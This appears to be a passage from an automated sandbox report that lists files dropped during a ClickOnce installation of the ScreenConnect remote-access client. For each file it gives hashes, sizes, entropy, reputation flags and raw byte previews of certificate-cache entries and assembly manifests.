                                                                                                                                                                              Preview:p...... ........HL!..+..(...............................................^E.5.*.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                              Entropy (8bit):3.2220917896724686
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:kKH9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:ODImsLNkPlE99SNxAhUe/3
                                                                                                                                                                              MD5:49D50750DFE8E9105163D70435CCB31A
                                                                                                                                                                              SHA1:361329BC152826B970C495C94C6B581A193CDF2C
                                                                                                                                                                              SHA-256:14749747E9521976E718D7F3424F8B1BD1F592C1F4924948CB449D9D55AA95DD
                                                                                                                                                                              SHA-512:83B63E1E65A500459B4C1D058319C7EBFDC64E8C4ACA78BAC7AC19D6128533FA9C37E15571BB9218EE7521A704D3D3404D688B07358B2B69EB62909BFC1651E3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:p...... ........>cpb.*..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):404
                                                                                                                                                                              Entropy (8bit):3.9240099056320994
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:kK3jWk6hhQfOAUMivhClroFHXHDZA6liyZlSlMul0bg3PWovy28lhlwA9RyclWn:HFmxMiv8sF3HtllJZIvOP200A9UUW
                                                                                                                                                                              MD5:3B1C1077A8C2A2250C6AC51664505585
                                                                                                                                                                              SHA1:9C020EF5CEA872D62FF2B5F033A6878F3DACF698
                                                                                                                                                                              SHA-256:AE6CC0BCD4087FB245C6B8DCFEF39D28ED6F6CBBD5229818FDBA723AFAA50C0F
                                                                                                                                                                              SHA-512:9549195CB431B9C83C989828439664323FC1BE31EF6CD01EF7CD62FDAB61FD7C637A292529B22A178944084DD441211E64C27640A9A16D211395AD550ACF9BA9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:p...... .... ...._...*..(................G./.)......./......................./.. ...........-*.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.u.T.Y.A.U.b.z.P.Z.m.Q.p.m.J.m.N.W.6.l.8.4.%.3.D...

                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):412
                                                                                                                                                                              Entropy (8bit):4.011468422985992
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:OU6F95SmxMiv8sFBSfamB3rbFURMOlAkr:76FzSmxxv7Sf13rbQJr
                                                                                                                                                                              MD5:4079F296F7DA7BEDF995A97BFF1D93FA
                                                                                                                                                                              SHA1:05349557531F8DBDA849D9A90F15521AB9FAD291
                                                                                                                                                                              SHA-256:98E1C2B671349D365A8A63552E698D49629F724AAA2331789655310C76DC15B9
                                                                                                                                                                              SHA-512:FC4CA759162B49A4C938B0CF3A4C8934135B8EE238455D637CB7F3019CBDC550D04E7889DD631CD3B2D2B1B66CAF031F29CD3BD6CE814B391A5E67FE8F7A685D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:p...... ....(........*..(................]@.(....$. .....................$. ... .........".+*.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):254
                                                                                                                                                                              Entropy (8bit):3.0454180223653617
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:kKptLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:fLYS4tWOxSW0PAMsZp
                                                                                                                                                                              MD5:BB305B10EF7153417E5C69E6E49210D6
                                                                                                                                                                              SHA1:B54F49066486F8B2A3AA971771B98231AEFB47CC
                                                                                                                                                                              SHA-256:57A881C8278B7D652A63C2B4EC90713B7C3B12A4CD3BE54738AE00ED8C620E0F
                                                                                                                                                                              SHA-512:DD51C4F3E56BA2C76FDDA4774702B33E827B9A4B5F44A27581225FD884EBF8EA1BCF42CFD96FD61D89CFE37A89D4788877638A9F6EF56C4A2E9189C348530ADC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:p...... ....l......r*..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445.cdf-ms

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):25496
                                                                                                                                                                              Entropy (8bit):5.641771107273899
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:93UqakYvm1K86qvAX9hCjX9R/QPIBM7Y6Ou8U8ecsUiOg:9tlYvm96WAX94X9R/QPI+0du8XU
                                                                                                                                                                              MD5:CCC685567EF52AB16009766479D61B95
                                                                                                                                                                              SHA1:1EE41B15C8DB79B6E5225195091B165608752844
                                                                                                                                                                              SHA-256:C5AB2C771EFCFED016C8D62210A65F31A50E1B7CB8D0ECAE5C5ABBE198A9704F
                                                                                                                                                                              SHA-512:8BAF2D4EC1A76A910683B0B76C4C175B4EAF43BF59CCAA5108B20C079971549783AE8F70C59C8A126A9F8EA4200C38E85DE4ADC583997F1D9E0306BCD71B6A85
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:PcmH...........u]..f.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$..........Y.p.:.........S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K.....E..X.N....u..IV..R......D..S......3LD.SV...[s.T..<Y...O.&r..Vz\...........`.......=...O...T...W...Z...].......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445.manifest

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):17866
                                                                                                                                                                              Entropy (8bit):5.957264907751996
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:jeowfbgEfIaMLf6svxX9nCCX9FX9R/QPIYM7Y7:jF68xX9fX9FX9R/QPIN07
                                                                                                                                                                              MD5:F4B84E283123B025A90BBDE33E2080FD
                                                                                                                                                                              SHA1:CC57BFD02228BE76C6E08BDE16996FA992FF0E54
                                                                                                                                                                              SHA-256:93F9EB492B6952D8C7AA1EF1EE5A901234BA1FD2D5EF58D24E1FAEF597EA8E02
                                                                                                                                                                              SHA-512:ABC92965BF97C37A614B556D2219D06E63687777D79DF5FFB4B5D447DD138C160E5A45CAB76A2353D758AD62960F2E58745F0523881FF6C0EA4CCBCD7ED40002
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="23.9.10.8817" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="23.9.10.8817" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9.cdf-ms

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3452
                                                                                                                                                                              Entropy (8bit):4.479272723108119
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:kZWvuWWjeV+WwQXqmL4Mco7rwQQNLokgmhIYX:n7J9UMco3QxgGf
                                                                                                                                                                              MD5:63279C20E2F3749270984C29C793D055
                                                                                                                                                                              SHA1:01C9E866764BBEF4879276EE72D99A85EE83DBFC
                                                                                                                                                                              SHA-256:AB7C6AB2985AC24CD85258E42598C2450CB99CBF60D4BA9EA80A338BC4CED207
                                                                                                                                                                              SHA-512:C845123B3FB7E37502E86E86BD6B1B606B120AEDA77B5FB46DF8A6F28D03E1259C4F8EA7BFBC45189FC002A873606B1C946EDAB1EBFBAE3782BBCF1F629C5BBD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:PcmH........y.4x ...#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$..........Y.p.:.......'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...................................................................................................................................................................................................nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%23.9.10.8817....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9.manifest

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                              Entropy (8bit):5.130181995746891
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onR+geP0AKvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AGGVETDTo
                                                                                                                                                                              MD5:6DA6DC34636435E9C2BD1B5FF79091B5
                                                                                                                                                                              SHA1:61B6D8C16330FE9063F041BCC025C10DE82D876B
                                                                                                                                                                              SHA-256:98D4EDAA86468540D2D17EF17A9BCD7224B128099A51A8F92A65A88950DCB44C
                                                                                                                                                                              SHA-512:0BB929107ECFA257DFB2FF7B37955D8C2402287E989C015632A6292362858667A398AD0563103C1324A29585A8177AAA4BCE3C57D867735E40D2CC5C996BD5B9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9.cdf-ms

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5260
                                                                                                                                                                              Entropy (8bit):4.868524490497656
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:vR8aP+RxU9LWeV+Ww7DkVyuokZR+PtYAaUeiBdVfNODngnsRR:ORxUNpJ9VbPZR+VHaodX+Qc
                                                                                                                                                                              MD5:2FE0E22C3E8600C64E8399680A6BDB45
                                                                                                                                                                              SHA1:7B6E0B72F8147F5A7B93766C892E4B2D85613DBF
                                                                                                                                                                              SHA-256:38D360EEEA5E7840CD26917CD4092A48FD74DBD024A7A57382A0FDCBAD9231D8
                                                                                                                                                                              SHA-512:05B2F361B12646C0A62BEB632F6DB5A85B805AB36D191CA49BAEB629BBE3E61A2B8075793C94AE96EE6725EB1D6E5008E632F504A36F410444F0FBBE8228827D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:PcmH........%....yJ.4...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$..........Y.p.:.......[.......................z..w.....[~31.X......E..X.....s".I...R....C.........y..&..d."....B(.....#...^.ie...u&...F.....Ey)....+.`...m,......;../............... ...$...'...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........l...@.......................................(........... .......(.......<...(...L.......t.......|...(...............................(.......................(...$.......L.......T...(...d...................(.......................(...............d...........p.......................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9.manifest

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1982
                                                                                                                                                                              Entropy (8bit):5.056583067402645
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRbggeP0AovSkcyMQcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AkHMQGQAXRTFgTo
                                                                                                                                                                              MD5:1FB3A39063C9FBBC9252D1224CF8C89D
                                                                                                                                                                              SHA1:0F0622EB6205F515651E055C17D0067A94308721
                                                                                                                                                                              SHA-256:199C3F5089B07F1FB6CB343180620B2094BCDDA9E1F6A3F41269C56402D98439
                                                                                                                                                                              SHA-512:8C70FF2FE2F1935454AA6BB4CE0998DA1ADCBFE7219F1EAEE4688EE86BBC730DE30347F39B9B1413CBD345D1BF786491ED2F79142D9333DBA3A7F0EDC9F48E3A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6.cdf-ms

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):6588
                                                                                                                                                                              Entropy (8bit):3.9907209780729116
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:KBHGBIeeV+Wwwz8WpMbLYIsVJCMvCRgj6g5S7Gn6qB/M:VIBJDpMXE7Xf6d
                                                                                                                                                                              MD5:D3A222297153D1019A962FE799A9F111
                                                                                                                                                                              SHA1:9F27D72E9C0A57F9B191D80BA8038B7C78CF605D
                                                                                                                                                                              SHA-256:7F4CD63365ACA9692DF05969A0917FDEB3654610478883196FE58A7AC4B4450C
                                                                                                                                                                              SHA-512:4B059A3711D3C9A9071F05CA6904630954243D06C7B2E56507559E20995A9FA73C3EECD0E64F72375A5A67378FC71DDAADC8DD787F63730F9FD5A88DA7619D3A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:PcmH.........B....5.@...........T...............t...........?........<.g..J.|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$..........Y.p.:...........}'.d................z..w.....[~31.X......E..X.....s".I...R....y..&..d."....B(.....#...C.....&...^.ie...u)...O.&r..Vz,...F.....Ey/...[s.T..<2...f..VC..5......;..8.....V....X;........... ...$...'...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...X...........@........................... .......0...(...8.......`.......h.......|...(...............................(.......................(... .......H.......P...(...d...................(.......................(.......................(...0.......X.......`...(...l...................(.......................(...................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6.manifest

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2573
                                                                                                                                                                              Entropy (8bit):5.02538862565643
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:3FYZ8h9o5gI0A7HMQAXQ3MQTMQRGTDBTo:1YiW4AIBvtI
                                                                                                                                                                              MD5:EFA59A7F55AF829C3974A02F30EBE80C
                                                                                                                                                                              SHA1:0FABA6763D910D5EE104E3457045C63CCC5BF79B
                                                                                                                                                                              SHA-256:3E2D5CC7867AFA23663D5894127CE6E2880D3075773A249B37576EDA5088875A
                                                                                                                                                                              SHA-512:72262B09C21DC4A2B2701A5B32C149349FA3107035D5A115EAC4335E3961DCF12A7A867AEFF595C13AA618EA955B604538C0F4E529CB6A76FFF0CB75927CC74D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd.cdf-ms

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3032
                                                                                                                                                                              Entropy (8bit):4.726757905074407
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:ORQK3QSc8V4g5e6S+9oww7gB7wHzlK1SbDddFfjM2Qnwbn:sQDScueV+WwwQwzlMMDrFrMtnEn
                                                                                                                                                                              MD5:61F68B83DDE2AD7405637AD82CC21D71
                                                                                                                                                                              SHA1:F3688A70CF6FFB4EEDDB91622BEE057F27C37C50
                                                                                                                                                                              SHA-256:C37855257D2375E82D2EC61E9FDCF0953221807215ADD6269EB502CDFF81117D
                                                                                                                                                                              SHA-512:DA38426D2B0A26A203C98D33F840A8985966025A0E9ABEA343CB1E3D8001E2C4E2905396AFD05E56B81763E503905CC4310174E54399ACE7497C8557B35AA57F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:PcmH.........t.+.1..............T....................................<.g..J.|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$..........Y.p.:.........S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...............................................................................................................................................................nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%23.9.10.8817....................................................MdHd............<...........MdSp ...$....... ...".............n: urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd.manifest

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1041
                                                                                                                                                                              Entropy (8bit):5.148278749531531
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0ApR7vNxW57FpS+iENg49vNxW5NgMiNg49vNxWO:JdFYZ8h9onRigeP0AqvSkcyMQcVSkTo
                                                                                                                                                                              MD5:9CE092E164085CE2566F654314BF99DC
                                                                                                                                                                              SHA1:ACEF36091EC262A4C42AA5A5B394C71B13B4767E
                                                                                                                                                                              SHA-256:6B36DDCE4021FD15C29CF63C7102E60EDFE2627D1B00EF97D0B4DE3051737439
                                                                                                                                                                              SHA-512:95BD7F9315DC181DE529D940E697B652651BC9E954E96FBC059998909259A719AF062548C533D24350C25A159CB113F568EB7C622AE3069CE25FB9224EBF02A6
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28.cdf-ms

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):14612
                                                                                                                                                                              Entropy (8bit):5.712742207617309
                                                                                                                                                                              Encrypted:false
